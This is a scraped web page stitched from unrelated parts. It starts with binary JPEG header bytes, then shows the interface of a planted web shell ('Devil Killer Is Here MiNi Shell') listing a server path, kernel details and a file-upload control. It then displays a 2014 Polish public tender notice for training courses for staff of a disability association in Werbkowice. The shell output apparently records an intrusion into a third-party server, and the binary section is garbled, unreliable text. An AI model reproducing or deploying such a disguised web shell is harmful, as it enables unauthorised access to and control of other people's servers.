JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140325/100004-N-2014.html

<p class="kh_header"><b>Werbkowice: Usługa zorganizowania i przeprowadzenia wyjazdowych kursów dla pracowników Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym Koło w Werbkowicach  w ramach Projektu pn. Transgraniczna współpraca na rzecz edukacji, rehabilitacji i turystyki osób niepełnosprawnych - przebudowa, rozbudowa i adaptacja budynków rehabilitacyjnych w Alojzowie i Lwowie.

Projekt współfinansowany z Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013</b><br>
<b>Numer ogłoszenia: 100004 - 2014; data zamieszczenia: 25.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polskie Stowarzyszenie na Rzecz Osób z Upośledzeniem Umysłowym Koło w Werbkowicach , ul. Piłsudskiego 4, 22-550 Werbkowice, woj. lubelskie, tel. 84 6572049, faks 84 6572049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.werbkowice.psouu.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: organizacja pozarządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania i przeprowadzenia wyjazdowych kursów dla pracowników Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym Koło w Werbkowicach  w ramach Projektu pn. Transgraniczna współpraca na rzecz edukacji, rehabilitacji i turystyki osób niepełnosprawnych - przebudowa, rozbudowa i adaptacja budynków rehabilitacyjnych w Alojzowie i Lwowie.

Projekt współfinansowany z Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa (zwana dalej usługą lub zamówieniem) obejmująca  zorganizowanie i przeprowadzenie trzech wyjazdowych kursów dla pracowników Polskiego Stowarzyszenia na Rzecz Osób z Upośledzeniem Umysłowym Koło w Werbkowicach w ramach Projektu pn. Transgraniczna współpraca na rzecz edukacji, rehabilitacji i turystyki osób niepełnosprawnych - przebudowa, rozbudowa i adaptacja budynków rehabilitacyjnych w Alojzowie i Lwowie współfinansowanego z Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013.
2.Zamówienie jest realizowane w podziale na 3 części:
Część 1 zamówienia - Organizacja i przeprowadzenie kursu NDT BOBATH - kurs podstawowy.
Część 2 zamówienia - Organizacja i przeprowadzenie kursu Integracja Sensoryczna - II stopnia.
Część 3 zamówienia - Organizacja i przeprowadzenie kursu Metoda Ruchu Rozwijającego Weroniki Sherborne.
3.Szczegółowy Opis Przedmiotu Zamówienia (SzOPZ) znajduje się w Załącznikach nr 8a, 8b, 8c do specyfikacji istotnych warunków zamówienia i będzie stanowić załącznik do umowy na wykonanie określonej Części zamówienia, po jej zawarciu.
4.Szczegółowe warunki realizacji usługi zostały określone w umowie, której projekt stanowi odpowiednio Załącznik nr 7a, 7b, 7c  do specyfikacji istotnych warunków zamówienia.
5.Dokumentacja szkoleniowa, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sale szkoleniowe - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina 2007 - 2013.
6.Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p.poż. Sale wykładowe powinny być przystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne.
7.Usługi szkoleniowe objęte przedmiotem zamówienia są finansowane ze środków publicznych w 90 %.
8.Każdy Wykonawca może złożyć w niniejszym postępowaniu o udzielenie zamówienia publicznego oferty częściowe na jedną, dwie lub więcej części zamówienia. Przy czym na jedną część zamówienia może złożyć tylko jedną ofertę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże - dla każdej Części zamówienia oddzielnie - dysponowanie osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług szkoleniowych, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz  informacją o podstawie do dysponowania tymi osobami. 
Wykonawca wykaże dysponowanie osobami (wykładowcami/trenerami) posiadającymi odpowiednie wykształcenie i przygotowanie merytoryczne do prowadzenia poszczególnych kursów:
a)	dla Części 1 zamówienia  - Wykonawca wykaże dysponowanie                        co najmniej 1 osobą (wykładowcą/trenerem) przewidzianą do realizacji zamówienia, posiadającą:
-numerowany certyfikat zgodny z przepisami EBTA (European Bobath Tutors Association z siedzibą w Londynie), potwierdzony przez Polskie Stowarzyszenie Terapeutów NDT-Bobath i Polskie Towarzystwo Fizjoterapii (PTF), 
-przynależność (członkostwo) do Polskiego Stowarzyszenia NDT-Bobath (jedynej w Polsce  instytucji odpowiedzialnej za stronę merytoryczną kursów i szkoleń z zakresu usprawniania Metodą NDT-Bobath, a także uprawnioną do propagowania informacji dotyczących metody oraz do używania znaku NDT-Bobath),
-doświadczenie merytoryczne i dydaktyczne, tj. ukończone specjalistyczne kursy z zakresu NDT-Bobath Basic, NDT- Bobath Baby oraz NDT-Baby Advanced (zorganizowała i przeprowadziła  co najmniej 3 kursy w zakresie NDT-Bobath Basic) i obecnie pracuje tą metodą, 

b)	dla Części 2 zamówienia  - Wykonawca wykaże dysponowanie  osobami przewidzianymi do przeprowadzenia kursu, tj. co najmniej dwoma certyfikowanymi instruktorami SI (w tym instruktor-fizjoterapeuta), lub jednym seniorem instruktorem SI Polskiego Towarzystwa Integracji Sensorycznej (PTIS), posiadającym/i: 
-przynależność (członkostwo) do Polskiego Towarzystwa Integracji Sensorycznej, 
-kwalifikacje oraz doświadczenie merytoryczne i dydaktyczne, tj. każdy z nich przeprowadził min. 5 kursów SI I stopnia oraz min. 5 kursów SI II  stopnia w zakresie zgodnym z tematyką kursu oraz wytycznymi Polskiego Towarzystwa Integracji Sensorycznej,

c)	dla Części 3 zamówienia - Wykonawca wykaże dysponowanie co najmniej 1 osobą - liderem, przewidzianym do przeprowadzenia kursu, posiadającym: 
-upoważnienie wydane przez ISCO (International Sherborne Co-operation w Wielkiej Brytanii), 
-kwalifikacje oraz doświadczenie merytoryczne, tj. przeprowadził min. 5 kursów podstawowych (Basic Course-BC), poziom I i II krajowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go  z nimi stosunków, to Wykonawca w takiej sytuacji zobowiązany jest do udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany zawartej umowy w następujących przypadkach: 
1)	w przypadku gdy nastąpi zmiana wytycznych, zasad, reguł, dokumentów programowych lub innych dokumentów dotyczących realizacji projektów w ramach Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina 2007-2013, dopuszcza się możliwość zmiany postanowień umowy w zakresie wynikającym ze zmian wyżej wymienionych dokumentów,
2)	w przypadku wydłużenia terminu realizacji Projektu ponad termin określony w umowie, wydłużeniu ulegnie termin realizacji zamówienia, bez zmiany wynagrodzenia Wykonawcy,
3)	w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy dopuszcza się możliwość zmiany postanowień umowy, w tym również terminu realizacji,
4)	zmiana terminów i warunków realizacji, jeżeli ich zmiana jest konieczna z powodu działania siły wyższej, tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje, i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego.
Pod pojęciem siły wyższej na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne:
a)	o charakterze niezależnym od stron,
b)	którego nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego,
c)	którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
d)	którego nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: 
a)	powódź, pożar,  
b)	inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru,
c)	zamieszki, strajki, ataki terrorystyczne, działania wojenne, 
d)	nagłe i długotrwałe przerwy w dostawie energii elektrycznej,
e)	promieniowanie lub skażenia,
f)	nieprzewidziane uszkodzenie lub zniszczenie obiektu budowlanego, urządzenia technicznego lub systemu urządzeń technicznych powodujące przerwę w ich używaniu lub utratę ich właściwości, bez których zrealizowanie założonego pierwotnie celu umowy stało się niemożliwe,
g)	wystąpienie na obszarze, na którym realizowany jest przedmiot umowy zakażeń lub zachorowań na chorobę zakaźną lub innych zjawisk związanych ze zdrowiem w liczbie większej niż zwykle albo wystąpienie zakażeń lub chorób zakaźnych dotychczas niewystępujących.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, których wystąpienie musi być normalnie brane pod uwagę przy składaniu ofert.
5)	zmiany wskutek wystąpienia innych okoliczności nie wynikających z winy Wykonawcy ani Zamawiającego, których mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego, a zrealizowanie założonego pierwotnie celu umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla Zamawiającego.
6)	zmiana osoby/osób
Zmiana osób przewidzianych do pełnienia funkcji trenera/wykładowcy/instruktora dopuszczalna jest jedynie w szczególnych okolicznościach, po uprzednim wyrażeniu zgody przez Zamawiającego na taką zamianę, z zastrzeżeniem, że zmiana taka może nastąpić jedynie na osobę o takich samych lub wyższych kwalifikacjach i doświadczeniu. Wniosek o zmianę trenera/wykładowcy/instruktora zawierać będzie informację  o kwalifikacjach, doświadczeniu, wykształceniu i powierzonych obowiązkach  oraz uzasadnienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.werbkowice.psouu.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać nieodpłatnie w PSOUU Koło w Werbkowicach Warsztat Terapii Zajęciowej w Turkowicach, 22-530 Mircze, Turkowice 131, pok. Nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 13:00, miejsce: Oferty należy składać w siedzibie Zamawiającego:PSOUU Koło w Werbkowicach  Warsztat Terapii Zajęciowej w Turkowicach,22-530 Mircze, Turkowice 131, pok. Nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest udzielane w ramach Projektu współfinansowanego z Europejskiego Instrumentu Sąsiedztwa i Partnerstwa w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007-2013.
2. Otwarcie ofert nastąpi w dniu 02.04.2014 r. o godz. 13:30 w siedzibie Zamawiającego - PSOUU Koło w Werbkowicach  Warsztat Terapii Zajęciowej w Turkowicach, 22-530 Mircze, Turkowice 131, pok. Nr 20.
3.Osoby uprawnione do kontaktów z Wykonawcami: Wojciech Krempla nr fax (84) 657-20-49, e-mail wtz.turkowice@psouu.org.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 zamówienia - Organizacja i przeprowadzenie kursu NDT BOBATH - kurs podstawowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 zamówienia - Organizacja i przeprowadzenie kursu NDT BOBATH - kurs podstawowy.

1.	Czas trwania i sposób organizacji kursu:
1)	Kursu NDT BOBATH - kurs podstawowy zostanie zrealizowany w terminie od dnia zawarcia umowy Zamawiającego z Wykonawcą maksymalnie do dnia 31 grudnia 2014 r.,
2)	w kursie będzie brała udział jedna osoba, na którą będzie przypadało 360 godz. wykładów teoretycznych i zajęć praktycznych (1 godz. kursu=45 min.), 
3)	przewidywany okres trwania kursu: 53 dni (łącznie z egzaminami),
4)	kurs powinien zostać przeprowadzony w ciągu 8 do 12 tygodni (w zależności od liczby godzin codziennych zajęć),
5)	całość kursu może zostać podzielona na dwie części z przerwą pomiędzy częścią 1-szą i częścią 2-gą, lub prowadzona w trybie ciągłym,
6)	w ramach wykonania usługi Wykonawca zapewni:
